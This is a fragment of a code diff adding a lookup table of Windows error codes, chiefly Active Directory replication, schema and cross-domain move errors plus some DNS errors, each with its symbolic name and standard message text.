+ 0x00002102: ("ERROR_DS_DRA_OBJ_IS_REP_SOURCE", "The naming context cannot be removed because it is replicated to another server."),
+ 0x00002103: ("ERROR_DS_DRA_DB_ERROR", "The replication operation encountered a database error."),
+ 0x00002104: ("ERROR_DS_DRA_NO_REPLICA", "The naming context is in the process of being removed or is not replicated from the specified server."),
+ 0x00002105: ("ERROR_DS_DRA_ACCESS_DENIED", "Replication access was denied."),
+ 0x00002106: ("ERROR_DS_DRA_NOT_SUPPORTED", "The requested operation is not supported by this version of the directory service."),
+ 0x00002107: ("ERROR_DS_DRA_RPC_CANCELLED", "The replication remote procedure call was cancelled."),
+ 0x00002108: ("ERROR_DS_DRA_SOURCE_DISABLED", "The source server is currently rejecting replication requests."),
+ 0x00002109: ("ERROR_DS_DRA_SINK_DISABLED", "The destination server is currently rejecting replication requests."),
+ 0x0000210a: ("ERROR_DS_DRA_NAME_COLLISION", "The replication operation failed due to a collision of object names."),
+ 0x0000210b: ("ERROR_DS_DRA_SOURCE_REINSTALLED", "The replication source has been reinstalled."),
+ 0x0000210c: ("ERROR_DS_DRA_MISSING_PARENT", "The replication operation failed because a required parent object is missing."),
+ 0x0000210d: ("ERROR_DS_DRA_PREEMPTED", "The replication operation was preempted."),
+ 0x0000210e: ("ERROR_DS_DRA_ABANDON_SYNC", "The replication synchronization attempt was abandoned because of a lack of updates."),
+ 0x0000210f: ("ERROR_DS_DRA_SHUTDOWN", "The replication operation was terminated because the system is shutting down."),
+ 0x00002110: ("ERROR_DS_DRA_INCOMPATIBLE_PARTIAL_SET", "Synchronization attempt failed because the destination DC is currently waiting to synchronize new partial attributes from source. This condition is normal if a recent schema change modified the partial attribute set. The destination partial attribute set is not a subset of source partial attribute set."),
+ 0x00002111: ("ERROR_DS_DRA_SOURCE_IS_PARTIAL_REPLICA", "The replication synchronization attempt failed because a master replica attempted to sync from a partial replica."),
+ 0x00002112: ("ERROR_DS_DRA_EXTN_CONNECTION_FAILED", "The server specified for this replication operation was contacted, but that server was unable to contact an additional server needed to complete the operation."),
+ 0x00002113: ("ERROR_DS_INSTALL_SCHEMA_MISMATCH", "The version of the directory service schema of the source forest is not compatible with the version of directory service on this computer."),
+ 0x00002114: ("ERROR_DS_DUP_LINK_ID", "Schema update failed: An attribute with the same link identifier already exists."),
+ 0x00002115: ("ERROR_DS_NAME_ERROR_RESOLVING", "Name translation: Generic processing error."),
+ 0x00002116: ("ERROR_DS_NAME_ERROR_NOT_FOUND", "Name translation: Could not find the name or insufficient right to see name."),
+ 0x00002117: ("ERROR_DS_NAME_ERROR_NOT_UNIQUE", "Name translation: Input name mapped to more than one output name."),
+ 0x00002118: ("ERROR_DS_NAME_ERROR_NO_MAPPING", "Name translation: Input name found, but not the associated output format."),
+ 0x00002119: ("ERROR_DS_NAME_ERROR_DOMAIN_ONLY", "Name translation: Unable to resolve completely, only the domain was found."),
+ 0x0000211a: ("ERROR_DS_NAME_ERROR_NO_SYNTACTICAL_MAPPING", "Name translation: Unable to perform purely syntactical mapping at the client without going out to the wire."),
+ 0x0000211b: ("ERROR_DS_CONSTRUCTED_ATT_MOD", "Modification of a constructed attribute is not allowed."),
+ 0x0000211c: ("ERROR_DS_WRONG_OM_OBJ_CLASS", "The OM-Object-Class specified is incorrect for an attribute with the specified syntax."),
+ 0x0000211d: ("ERROR_DS_DRA_REPL_PENDING", "The replication request has been posted; waiting for reply."),
+ 0x0000211e: ("ERROR_DS_DS_REQUIRED", "The requested operation requires a directory service, and none was available."),
+ 0x0000211f: ("ERROR_DS_INVALID_LDAP_DISPLAY_NAME", "The LDAP display name of the class or attribute contains non-ASCII characters."),
+ 0x00002120: ("ERROR_DS_NON_BASE_SEARCH", "The requested search operation is only supported for base searches."),
+ 0x00002121: ("ERROR_DS_CANT_RETRIEVE_ATTS", "The search failed to retrieve attributes from the database."),
+ 0x00002122: ("ERROR_DS_BACKLINK_WITHOUT_LINK", "The schema update operation tried to add a backward link attribute that has no corresponding forward link."),
+ 0x00002123: ("ERROR_DS_EPOCH_MISMATCH", "Source and destination of a cross-domain move do not agree on the object's epoch number. Either source or destination does not have the latest version of the object."),
+ 0x00002124: ("ERROR_DS_SRC_NAME_MISMATCH", "Source and destination of a cross-domain move do not agree on the object's current name. Either source or destination does not have the latest version of the object."),
+ 0x00002125: ("ERROR_DS_SRC_AND_DST_NC_IDENTICAL", "Source and destination for the cross-domain move operation are identical. Caller should use local move operation instead of cross-domain move operation."),
+ 0x00002126: ("ERROR_DS_DST_NC_MISMATCH", "Source and destination for a cross-domain move are not in agreement on the naming contexts in the forest. Either source or destination does not have the latest version of the Partitions container."),
+ 0x00002127: ("ERROR_DS_NOT_AUTHORITIVE_FOR_DST_NC", "Destination of a cross-domain move is not authoritative for the destination naming context."),
+ 0x00002128: ("ERROR_DS_SRC_GUID_MISMATCH", "Source and destination of a cross-domain move do not agree on the identity of the source object. Either source or destination does not have the latest version of the source object."),
+ 0x00002129: ("ERROR_DS_CANT_MOVE_DELETED_OBJECT", "Object being moved across-domains is already known to be deleted by the destination server. The source server does not have the latest version of the source object."),
+ 0x0000212a: ("ERROR_DS_PDC_OPERATION_IN_PROGRESS", "Another operation which requires exclusive access to the PDC FSMO is already in progress."),
+ 0x0000212b: ("ERROR_DS_CROSS_DOMAIN_CLEANUP_REQD", "A cross-domain move operation failed such that two versions of the moved object exist - one each in the source and destination domains. The destination object needs to be removed to restore the system to a consistent state."),
+ 0x0000212c: ("ERROR_DS_ILLEGAL_XDOM_MOVE_OPERATION", "This object may not be moved across domain boundaries either because cross-domain moves for this class are disallowed, or the object has some special characteristics, e.g.: trust account or restricted RID, which prevent its move."),
+ 0x0000212d: ("ERROR_DS_CANT_WITH_ACCT_GROUP_MEMBERSHPS", "Can't move objects with memberships across domain boundaries as once moved, this would violate the membership conditions of the account group. Remove the object from any account group memberships and retry."),
+ 0x0000212e: ("ERROR_DS_NC_MUST_HAVE_NC_PARENT", "A naming context head must be the immediate child of another naming context head, not of an interior node."),
+ 0x0000212f: ("ERROR_DS_CR_IMPOSSIBLE_TO_VALIDATE", "The directory cannot validate the proposed naming context name because it does not hold a replica of the naming context above the proposed naming context. Please ensure that the domain naming master role is held by a server that is configured as a global catalog server, and that the server is up to date with its replication partners. (Applies only to Windows 2000 Domain Naming masters)"),
+ 0x00002130: ("ERROR_DS_DST_DOMAIN_NOT_NATIVE", "Destination domain must be in native mode."),
+ 0x00002131: ("ERROR_DS_MISSING_INFRASTRUCTURE_CONTAINER", "The operation cannot be performed because the server does not have an infrastructure container in the domain of interest."),
+ 0x00002132: ("ERROR_DS_CANT_MOVE_ACCOUNT_GROUP", "Cross-domain move of non-empty account groups is not allowed."),
+ 0x00002133: ("ERROR_DS_CANT_MOVE_RESOURCE_GROUP", "Cross-domain move of non-empty resource groups is not allowed."),
+ 0x00002134: ("ERROR_DS_INVALID_SEARCH_FLAG", "The search flags for the attribute are invalid. The ANR bit is valid only on attributes of Unicode or Teletex strings."),
+ 0x00002135: ("ERROR_DS_NO_TREE_DELETE_ABOVE_NC", "Tree deletions starting at an object which has an NC head as a descendant are not allowed."),
+ 0x00002136: ("ERROR_DS_COULDNT_LOCK_TREE_FOR_DELETE", "The directory service failed to lock a tree in preparation for a tree deletion because the tree was in use."),
+ 0x00002137: ("ERROR_DS_COULDNT_IDENTIFY_OBJECTS_FOR_TREE_DELETE", "The directory service failed to identify the list of objects to delete while attempting a tree deletion."),
+ 0x00002138: ("ERROR_DS_SAM_INIT_FAILURE", "Security Accounts Manager initialization failed because of the following error: %1."),
+ 0x00002139: ("ERROR_DS_SENSITIVE_GROUP_VIOLATION", "Only an administrator can modify the membership list of an administrative group."),
+ 0x0000213a: ("ERROR_DS_CANT_MOD_PRIMARYGROUPID", "Cannot change the primary group ID of a domain controller account."),
+ 0x0000213b: ("ERROR_DS_ILLEGAL_BASE_SCHEMA_MOD", "An attempt is made to modify the base schema."),
+ 0x0000213c: ("ERROR_DS_NONSAFE_SCHEMA_CHANGE", "Adding a new mandatory attribute to an existing class, deleting a mandatory attribute from an existing class, or adding an optional attribute to the special class Top that is not a backlink attribute (directly or through inheritance, for example, by adding or deleting an auxiliary class) is not allowed."),
+ 0x0000213d: ("ERROR_DS_SCHEMA_UPDATE_DISALLOWED", "Schema update is not allowed on this DC because the DC is not the schema FSMO Role Owner."),
+ 0x0000213e: ("ERROR_DS_CANT_CREATE_UNDER_SCHEMA", "An object of this class cannot be created under the schema container. You can only create attribute-schema and class-schema objects under the schema container."),
+ 0x0000213f: ("ERROR_DS_INSTALL_NO_SRC_SCH_VERSION", "The replica/child install failed to get the objectVersion attribute on the schema container on the source DC. Either the attribute is missing on the schema container or the credentials supplied do not have permission to read it."),
+ 0x00002140: ("ERROR_DS_INSTALL_NO_SCH_VERSION_IN_INIFILE", "The replica/child install failed to read the objectVersion attribute in the SCHEMA section of the file schema.ini in the system32 directory."),
+ 0x00002141: ("ERROR_DS_INVALID_GROUP_TYPE", "The specified group type is invalid."),
+ 0x00002142: ("ERROR_DS_NO_NEST_GLOBALGROUP_IN_MIXEDDOMAIN", "You cannot nest global groups in a mixed domain if the group is security-enabled."),
+ 0x00002143: ("ERROR_DS_NO_NEST_LOCALGROUP_IN_MIXEDDOMAIN", "You cannot nest local groups in a mixed domain if the group is security-enabled."),
+ 0x00002144: ("ERROR_DS_GLOBAL_CANT_HAVE_LOCAL_MEMBER", "A global group cannot have a local group as a member."),
+ 0x00002145: ("ERROR_DS_GLOBAL_CANT_HAVE_UNIVERSAL_MEMBER", "A global group cannot have a universal group as a member."),
+ 0x00002146: ("ERROR_DS_UNIVERSAL_CANT_HAVE_LOCAL_MEMBER", "A universal group cannot have a local group as a member."),
+ 0x00002147: ("ERROR_DS_GLOBAL_CANT_HAVE_CROSSDOMAIN_MEMBER", "A global group cannot have a cross-domain member."),
+ 0x00002148: ("ERROR_DS_LOCAL_CANT_HAVE_CROSSDOMAIN_LOCAL_MEMBER", "A local group cannot have another cross domain local group as a member."),
+ 0x00002149: ("ERROR_DS_HAVE_PRIMARY_MEMBERS", "A group with primary members cannot change to a security-disabled group."),
+ 0x0000214a: ("ERROR_DS_STRING_SD_CONVERSION_FAILED", "The schema cache load failed to convert the string default SD on a class-schema object."),
+ 0x0000214b: ("ERROR_DS_NAMING_MASTER_GC", "Only DSAs configured to be Global Catalog servers should be allowed to hold the Domain Naming Master FSMO role. (Applies only to Windows 2000 servers)"),
+ 0x0000214c: ("ERROR_DS_DNS_LOOKUP_FAILURE", "The DSA operation is unable to proceed because of a DNS lookup failure."),
+ 0x0000214d: ("ERROR_DS_COULDNT_UPDATE_SPNS", "While processing a change to the DNS Host Name for an object, the Service Principal Name values could not be kept in sync."),
+ 0x0000214e: ("ERROR_DS_CANT_RETRIEVE_SD", "The Security Descriptor attribute could not be read."),
+ 0x0000214f: ("ERROR_DS_KEY_NOT_UNIQUE", "The object requested was not found, but an object with that key was found."),
+ 0x00002150: ("ERROR_DS_WRONG_LINKED_ATT_SYNTAX", "The syntax of the linked attribute being added is incorrect. Forward links can only have syntax 2.5.5.1, 2.5.5.7, and 2.5.5.14, and backlinks can only have syntax 2.5.5.1"),
+ 0x00002151: ("ERROR_DS_SAM_NEED_BOOTKEY_PASSWORD", "Security Account Manager needs to get the boot password."),
+ 0x00002152: ("ERROR_DS_SAM_NEED_BOOTKEY_FLOPPY", "Security Account Manager needs to get the boot key from floppy disk."),
+ 0x00002153: ("ERROR_DS_CANT_START", "Directory Service cannot start."),
+ 0x00002154: ("ERROR_DS_INIT_FAILURE", "Directory Services could not start."),
+ 0x00002155: ("ERROR_DS_NO_PKT_PRIVACY_ON_CONNECTION", "The connection between client and server requires packet privacy or better."),
+ 0x00002156: ("ERROR_DS_SOURCE_DOMAIN_IN_FOREST", "The source domain may not be in the same forest as destination."),
+ 0x00002157: ("ERROR_DS_DESTINATION_DOMAIN_NOT_IN_FOREST", "The destination domain must be in the forest."),
+ 0x00002158: ("ERROR_DS_DESTINATION_AUDITING_NOT_ENABLED", "The operation requires that destination domain auditing be enabled."),
+ 0x00002159: ("ERROR_DS_CANT_FIND_DC_FOR_SRC_DOMAIN", "The operation couldn't locate a DC for the source domain."),
+ 0x0000215a: ("ERROR_DS_SRC_OBJ_NOT_GROUP_OR_USER", "The source object must be a group or user."),
+ 0x0000215b: ("ERROR_DS_SRC_SID_EXISTS_IN_FOREST", "The source object's SID already exists in destination forest."),
+ 0x0000215c: ("ERROR_DS_SRC_AND_DST_OBJECT_CLASS_MISMATCH", "The source and destination object must be of the same type."),
+ 0x0000215d: ("ERROR_SAM_INIT_FAILURE", "Security Accounts Manager initialization failed because of the following error: %1."),
+ 0x0000215e: ("ERROR_DS_DRA_SCHEMA_INFO_SHIP", "Schema information could not be included in the replication request."),
+ 0x0000215f: ("ERROR_DS_DRA_SCHEMA_CONFLICT", "The replication operation could not be completed due to a schema incompatibility."),
+ 0x00002160: ("ERROR_DS_DRA_EARLIER_SCHEMA_CONFLICT", "The replication operation could not be completed due to a previous schema incompatibility."),
+ 0x00002161: ("ERROR_DS_DRA_OBJ_NC_MISMATCH", "The replication update could not be applied because either the source or the destination has not yet received information regarding a recent cross-domain move operation."),
+ 0x00002162: ("ERROR_DS_NC_STILL_HAS_DSAS", "The requested domain could not be deleted because there exist domain controllers that still host this domain."),
+ 0x00002163: ("ERROR_DS_GC_REQUIRED", "The requested operation can be performed only on a global catalog server."),
+ 0x00002164: ("ERROR_DS_LOCAL_MEMBER_OF_LOCAL_ONLY", "A local group can only be a member of other local groups in the same domain."),
+ 0x00002165: ("ERROR_DS_NO_FPO_IN_UNIVERSAL_GROUPS", "Foreign security principals cannot be members of universal groups."),
+ 0x00002166: ("ERROR_DS_CANT_ADD_TO_GC", "The attribute is not allowed to be replicated to the GC because of security reasons."),
+ 0x00002167: ("ERROR_DS_NO_CHECKPOINT_WITH_PDC", "The checkpoint with the PDC could not be taken because there too many modifications being processed currently."),
+ 0x00002168: ("ERROR_DS_SOURCE_AUDITING_NOT_ENABLED", "The operation requires that source domain auditing be enabled."),
+ 0x00002169: ("ERROR_DS_CANT_CREATE_IN_NONDOMAIN_NC", "Security principal objects can only be created inside domain naming contexts."),
+ 0x0000216a: ("ERROR_DS_INVALID_NAME_FOR_SPN", "A Service Principal Name (SPN) could not be constructed because the provided hostname is not in the necessary format."),
+ 0x0000216b: ("ERROR_DS_FILTER_USES_CONTRUCTED_ATTRS", "A Filter was passed that uses constructed attributes."),
+ 0x0000216c: ("ERROR_DS_UNICODEPWD_NOT_IN_QUOTES", "The unicodePwd attribute value must be enclosed in double quotes."),
+ 0x0000216d: ("ERROR_DS_MACHINE_ACCOUNT_QUOTA_EXCEEDED", "Your computer could not be joined to the domain. You have exceeded the maximum number of computer accounts you are allowed to create in this domain. Contact your system administrator to have this limit reset or increased."),
+ 0x0000216e: ("ERROR_DS_MUST_BE_RUN_ON_DST_DC", "For security reasons, the operation must be run on the destination DC."),
+ 0x0000216f: ("ERROR_DS_SRC_DC_MUST_BE_SP4_OR_GREATER", "For security reasons, the source DC must be NT4SP4 or greater."),
+ 0x00002170: ("ERROR_DS_CANT_TREE_DELETE_CRITICAL_OBJ", "Critical Directory Service System objects cannot be deleted during tree delete operations. The tree delete may have been partially performed."),
+ 0x00002171: ("ERROR_DS_INIT_FAILURE_CONSOLE", "Directory Services could not start because of the following error: %1."),
+ 0x00002172: ("ERROR_DS_SAM_INIT_FAILURE_CONSOLE", "Security Accounts Manager initialization failed because of the following error: %1."),
+ 0x00002173: ("ERROR_DS_FOREST_VERSION_TOO_HIGH", "The version of the operating system is incompatible with the current AD DS forest functional level or AD LDS Configuration Set functional level. You must upgrade to a new version of the operating system before this server can become an AD DS Domain Controller or add an AD LDS Instance in this AD DS Forest or AD LDS Configuration Set."),
+ 0x00002174: ("ERROR_DS_DOMAIN_VERSION_TOO_HIGH", "The version of the operating system installed is incompatible with the current domain functional level. You must upgrade to a new version of the operating system before this server can become a domain controller in this domain."),
+ 0x00002175: ("ERROR_DS_FOREST_VERSION_TOO_LOW", "The version of the operating system installed on this server no longer supports the current AD DS Forest functional level or AD LDS Configuration Set functional level. You must raise the AD DS Forest functional level or AD LDS Configuration Set functional level before this server can become an AD DS Domain Controller or an AD LDS Instance in this Forest or Configuration Set."),
+ 0x00002176: ("ERROR_DS_DOMAIN_VERSION_TOO_LOW", "The version of the operating system installed on this server no longer supports the current domain functional level. You must raise the domain functional level before this server can become a domain controller in this domain."),
+ 0x00002177: ("ERROR_DS_INCOMPATIBLE_VERSION", "The version of the operating system installed on this server is incompatible with the functional level of the domain or forest."),
+ 0x00002178: ("ERROR_DS_LOW_DSA_VERSION", "The functional level of the domain (or forest) cannot be raised to the requested value, because there exist one or more domain controllers in the domain (or forest) that are at a lower incompatible functional level."),
+ 0x00002179: ("ERROR_DS_NO_BEHAVIOR_VERSION_IN_MIXEDDOMAIN", "The forest functional level cannot be raised to the requested value since one or more domains are still in mixed domain mode. All domains in the forest must be in native mode, for you to raise the forest functional level."),
+ 0x0000217a: ("ERROR_DS_NOT_SUPPORTED_SORT_ORDER", "The sort order requested is not supported."),
+ 0x0000217b: ("ERROR_DS_NAME_NOT_UNIQUE", "The requested name already exists as a unique identifier."),
+ 0x0000217c: ("ERROR_DS_MACHINE_ACCOUNT_CREATED_PRENT4", "The machine account was created pre-NT4. The account needs to be recreated."),
+ 0x0000217d: ("ERROR_DS_OUT_OF_VERSION_STORE", "The database is out of version store."),
+ 0x0000217e: ("ERROR_DS_INCOMPATIBLE_CONTROLS_USED", "Unable to continue operation because multiple conflicting controls were used."),
+ 0x0000217f: ("ERROR_DS_NO_REF_DOMAIN", "Unable to find a valid security descriptor reference domain for this partition."),
+ 0x00002180: ("ERROR_DS_RESERVED_LINK_ID", "Schema update failed: The link identifier is reserved."),
+ 0x00002181: ("ERROR_DS_LINK_ID_NOT_AVAILABLE", "Schema update failed: There are no link identifiers available."),
+ 0x00002182: ("ERROR_DS_AG_CANT_HAVE_UNIVERSAL_MEMBER", "An account group cannot have a universal group as a member."),
+ 0x00002183: ("ERROR_DS_MODIFYDN_DISALLOWED_BY_INSTANCE_TYPE", "Rename or move operations on naming context heads or read-only objects are not allowed."),
+ 0x00002184: ("ERROR_DS_NO_OBJECT_MOVE_IN_SCHEMA_NC", "Move operations on objects in the schema naming context are not allowed."),
+ 0x00002185: ("ERROR_DS_MODIFYDN_DISALLOWED_BY_FLAG", "A system flag has been set on the object and does not allow the object to be moved or renamed."),
+ 0x00002186: ("ERROR_DS_MODIFYDN_WRONG_GRANDPARENT", "This object is not allowed to change its grandparent container. Moves are not forbidden on this object, but are restricted to sibling containers."),
+ 0x00002187: ("ERROR_DS_NAME_ERROR_TRUST_REFERRAL", "Unable to resolve completely, a referral to another forest is generated."),
+ 0x00002188: ("ERROR_NOT_SUPPORTED_ON_STANDARD_SERVER", "The requested action is not supported on standard server."),
+ 0x00002189: ("ERROR_DS_CANT_ACCESS_REMOTE_PART_OF_AD", "Could not access a partition of the directory service located on a remote server. Make sure at least one server is running for the partition in question."),
+ 0x0000218a: ("ERROR_DS_CR_IMPOSSIBLE_TO_VALIDATE_V2", "The directory cannot validate the proposed naming context (or partition) name because it does not hold a replica nor can it contact a replica of the naming context above the proposed naming context. Please ensure that the parent naming context is properly registered in DNS, and at least one replica of this naming context is reachable by the Domain Naming master."),
+ 0x0000218b: ("ERROR_DS_THREAD_LIMIT_EXCEEDED", "The thread limit for this request was exceeded."),
+ 0x0000218c: ("ERROR_DS_NOT_CLOSEST", "The Global catalog server is not in the closest site."),
+ 0x0000218d: ("ERROR_DS_CANT_DERIVE_SPN_WITHOUT_SERVER_REF", "The DS cannot derive a service principal name (SPN) with which to mutually authenticate the target server because the corresponding server object in the local DS database has no serverReference attribute."),
+ 0x0000218e: ("ERROR_DS_SINGLE_USER_MODE_FAILED", "The Directory Service failed to enter single user mode."),
+ 0x0000218f: ("ERROR_DS_NTDSCRIPT_SYNTAX_ERROR", "The Directory Service cannot parse the script because of a syntax error."),
+ 0x00002190: ("ERROR_DS_NTDSCRIPT_PROCESS_ERROR", "The Directory Service cannot process the script because of an error."),
+ 0x00002191: ("ERROR_DS_DIFFERENT_REPL_EPOCHS", "The directory service cannot perform the requested operation because the servers involved are of different replication epochs (which is usually related to a domain rename that is in progress)."),
+ 0x00002192: ("ERROR_DS_DRS_EXTENSIONS_CHANGED", "The directory service binding must be renegotiated due to a change in the server extensions information."),
+ 0x00002193: ("ERROR_DS_REPLICA_SET_CHANGE_NOT_ALLOWED_ON_DISABLED_CR", "Operation not allowed on a disabled cross ref."),
+ 0x00002194: ("ERROR_DS_NO_MSDS_INTID", "Schema update failed: No values for msDS-IntId are available."),
+ 0x00002195: ("ERROR_DS_DUP_MSDS_INTID", "Schema update failed: Duplicate msDS-INtId. Retry the operation."),
+ 0x00002196: ("ERROR_DS_EXISTS_IN_RDNATTID", "Schema deletion failed: attribute is used in rDNAttID."),
+ 0x00002197: ("ERROR_DS_AUTHORIZATION_FAILED", "The directory service failed to authorize the request."),
+ 0x00002198: ("ERROR_DS_INVALID_SCRIPT", "The Directory Service cannot process the script because it is invalid."),
+ 0x00002199: ("ERROR_DS_REMOTE_CROSSREF_OP_FAILED", "The remote create cross reference operation failed on the Domain Naming Master FSMO. The operation's error is in the extended data."),
+ 0x0000219a: ("ERROR_DS_CROSS_REF_BUSY", "A cross reference is in use locally with the same name."),
+ 0x0000219b: ("ERROR_DS_CANT_DERIVE_SPN_FOR_DELETED_DOMAIN", "The DS cannot derive a service principal name (SPN) with which to mutually authenticate the target server because the server's domain has been deleted from the forest."),
+ 0x0000219c: ("ERROR_DS_CANT_DEMOTE_WITH_WRITEABLE_NC", "Writeable NCs prevent this DC from demoting."),
+ 0x0000219d: ("ERROR_DS_DUPLICATE_ID_FOUND", "The requested object has a non-unique identifier and cannot be retrieved."),
+ 0x0000219e: ("ERROR_DS_INSUFFICIENT_ATTR_TO_CREATE_OBJECT", "Insufficient attributes were given to create an object. This object may not exist because it may have been deleted and already garbage collected."),
+ 0x0000219f: ("ERROR_DS_GROUP_CONVERSION_ERROR", "The group cannot be converted due to attribute restrictions on the requested group type."),
+ 0x000021a0: ("ERROR_DS_CANT_MOVE_APP_BASIC_GROUP", "Cross-domain move of non-empty basic application groups is not allowed."),
+ 0x000021a1: ("ERROR_DS_CANT_MOVE_APP_QUERY_GROUP", "Cross-domain move of non-empty query based application groups is not allowed."),
+ 0x000021a2: ("ERROR_DS_ROLE_NOT_VERIFIED", "The FSMO role ownership could not be verified because its directory partition has not replicated successfully with at least one replication partner."),
+ 0x000021a3: ("ERROR_DS_WKO_CONTAINER_CANNOT_BE_SPECIAL", "The target container for a redirection of a well known object container cannot already be a special container."),
+ 0x000021a4: ("ERROR_DS_DOMAIN_RENAME_IN_PROGRESS", "The Directory Service cannot perform the requested operation because a domain rename operation is in progress."),
+ 0x000021a5: ("ERROR_DS_EXISTING_AD_CHILD_NC", "The directory service detected a child partition below the requested partition name. The partition hierarchy must be created in a top down method."),
+ 0x000021a6: ("ERROR_DS_REPL_LIFETIME_EXCEEDED", "The directory service cannot replicate with this server because the time since the last replication with this server has exceeded the tombstone lifetime."),
+ 0x000021a7: ("ERROR_DS_DISALLOWED_IN_SYSTEM_CONTAINER", "The requested operation is not allowed on an object under the system container."),
+ 0x000021a8: ("ERROR_DS_LDAP_SEND_QUEUE_FULL", "The LDAP servers network send queue has filled up because the client is not processing the results of its requests fast enough. No more requests will be processed until the client catches up. If the client does not catch up then it will be disconnected."),
+ 0x000021a9: ("ERROR_DS_DRA_OUT_SCHEDULE_WINDOW", "The scheduled replication did not take place because the system was too busy to execute the request within the schedule window. The replication queue is overloaded. Consider reducing the number of partners or decreasing the scheduled replication frequency."),
+ 0x000021aa: ("ERROR_DS_POLICY_NOT_KNOWN", "At this time, it cannot be determined if the branch replication policy is available on the hub domain controller. Please retry at a later time to account for replication latencies."),
+ 0x000021ab: ("ERROR_NO_SITE_SETTINGS_OBJECT", "The site settings object for the specified site does not exist."),
+ 0x000021ac: ("ERROR_NO_SECRETS", "The local account store does not contain secret material for the specified account."),
+ 0x000021ad: ("ERROR_NO_WRITABLE_DC_FOUND", "Could not find a writable domain controller in the domain."),
+ 0x000021ae: ("ERROR_DS_NO_SERVER_OBJECT", "The server object for the domain controller does not exist."),
+ 0x000021af: ("ERROR_DS_NO_NTDSA_OBJECT", "The NTDS Settings object for the domain controller does not exist."),
+ 0x000021b0: ("ERROR_DS_NON_ASQ_SEARCH", "The requested search operation is not supported for ASQ searches."),
+ 0x000021b1: ("ERROR_DS_AUDIT_FAILURE", "A required audit event could not be generated for the operation."),
+ 0x000021b2: ("ERROR_DS_INVALID_SEARCH_FLAG_SUBTREE", "The search flags for the attribute are invalid. The subtree index bit is valid only on single valued attributes."),
+ 0x000021b3: ("ERROR_DS_INVALID_SEARCH_FLAG_TUPLE", "The search flags for the attribute are invalid. The tuple index bit is valid only on attributes of Unicode strings."),
+ 0x000021b4: ("ERROR_DS_HIERARCHY_TABLE_TOO_DEEP", "The address books are nested too deeply. Failed to build the hierarchy table."),
+ 0x000021b5: ("ERROR_DS_DRA_CORRUPT_UTD_VECTOR", "The specified up-to-date-ness vector is corrupt."),
+ 0x000021b6: ("ERROR_DS_DRA_SECRETS_DENIED", "The request to replicate secrets is denied."),
+ 0x000021b7: ("ERROR_DS_RESERVED_MAPI_ID", "Schema update failed: The MAPI identifier is reserved."),
+ 0x000021b8: ("ERROR_DS_MAPI_ID_NOT_AVAILABLE", "Schema update failed: There are no MAPI identifiers available."),
+ 0x000021b9: ("ERROR_DS_DRA_MISSING_KRBTGT_SECRET", "The replication operation failed because the required attributes of the local krbtgt object are missing."),
+ 0x000021ba: ("ERROR_DS_DOMAIN_NAME_EXISTS_IN_FOREST", "The domain name of the trusted domain already exists in the forest."),
+ 0x000021bb: ("ERROR_DS_FLAT_NAME_EXISTS_IN_FOREST", "The flat name of the trusted domain already exists in the forest."),
+ 0x000021bc: ("ERROR_INVALID_USER_PRINCIPAL_NAME", "The User Principal Name (UPN) is invalid."),
+ 0x000021bd: ("ERROR_DS_OID_MAPPED_GROUP_CANT_HAVE_MEMBERS", "OID mapped groups cannot have members."),
+ 0x000021be: ("ERROR_DS_OID_NOT_FOUND", "The specified OID cannot be found."),
+ 0x000021bf: ("ERROR_DS_DRA_RECYCLED_TARGET", "The replication operation failed because the target object referred by a link value is recycled."),
+ 0x000021c0: ("ERROR_DS_DISALLOWED_NC_REDIRECT", "The redirect operation failed because the target object is in a NC different from the domain NC of the current domain controller."),
+ 0x000021c1: ("ERROR_DS_HIGH_ADLDS_FFL", "The functional level of the AD LDS configuration set cannot be lowered to the requested value."),
+ 0x000021c2: ("ERROR_DS_HIGH_DSA_VERSION", "The functional level of the domain (or forest) cannot be lowered to the requested value."),
+ 0x000021c3: ("ERROR_DS_LOW_ADLDS_FFL", "The functional level of the AD LDS configuration set cannot be raised to the requested value, because there exist one or more ADLDS instances that are at a lower incompatible functional level."),
+ 0x000021c4: ("ERROR_DOMAIN_SID_SAME_AS_LOCAL_WORKSTATION", "The domain join cannot be completed because the SID of the domain you attempted to join was identical to the SID of this machine. This is a symptom of an improperly cloned operating system install. You should run sysprep on this machine in order to generate a new machine SID. Please see https://go.microsoft.com/fwlink/?LinkId=168895 for more information."),
+ 0x000021c5: ("ERROR_DS_UNDELETE_SAM_VALIDATION_FAILED", "The undelete operation failed because the Sam Account Name or Additional Sam Account Name of the object being undeleted conflicts with an existing live object."),
+ 0x000021c6: ("ERROR_INCORRECT_ACCOUNT_TYPE", "The system is not authoritative for the specified account and therefore cannot complete the operation. Please retry the operation using the provider associated with this account. If this is an online provider please use the provider's online site."),
+ 0x00002329: ("DNS_ERROR_RCODE_FORMAT_ERROR", "DNS server unable to interpret format."),
+ 0x0000232a: ("DNS_ERROR_RCODE_SERVER_FAILURE", "DNS server failure."),
+ 0x0000232b: ("DNS_ERROR_RCODE_NAME_ERROR", "DNS name does not exist."),
+ 0x0000232c: ("DNS_ERROR_RCODE_NOT_IMPLEMENTED", "DNS request not supported by name server."),
+ 0x0000232d: ("DNS_ERROR_RCODE_REFUSED", "DNS operation refused."),
+ 0x0000232e: ("DNS_ERROR_RCODE_YXDOMAIN", "DNS name that ought not exist, does exist."),
+ 0x0000232f: ("DNS_ERROR_RCODE_YXRRSET", "DNS RR set that ought not exist, does exist."),
+ 0x00002330: ("DNS_ERROR_RCODE_NXRRSET", "DNS RR set that ought to exist, does not exist."),
+ 0x00002331: ("DNS_ERROR_RCODE_NOTAUTH", "DNS server not authoritative for zone."),
+ 0x00002332: ("DNS_ERROR_RCODE_NOTZONE", "DNS name in update or prereq is not in zone."),
+ 0x00002338: ("DNS_ERROR_RCODE_BADSIG", "DNS signature failed to verify."),
+ 0x00002339: ("DNS_ERROR_RCODE_BADKEY", "DNS bad key."),
+ 0x0000233a: ("DNS_ERROR_RCODE_BADTIME", "DNS signature validity expired."),
+ 0x0000238d: ("DNS_ERROR_KEYMASTER_REQUIRED", "Only the DNS server acting as the key master for the zone may perform this operation."),
+ 0x0000238e: ("DNS_ERROR_NOT_ALLOWED_ON_SIGNED_ZONE", "This operation is not allowed on a zone that is signed or has signing keys."),
+ 0x0000238f: ("DNS_ERROR_NSEC3_INCOMPATIBLE_WITH_RSA_SHA1", "NSEC3 is not compatible with the RSA-SHA-1 algorithm. Choose a different algorithm or use NSEC."),
+ 0x00002390: ("DNS_ERROR_NOT_ENOUGH_SIGNING_KEY_DESCRIPTORS", "The zone does not have enough signing keys. There must be at least one key signing key (KSK) and at least one zone signing key (ZSK)."),
+ 0x00002391: ("DNS_ERROR_UNSUPPORTED_ALGORITHM", "The specified algorithm is not supported."),
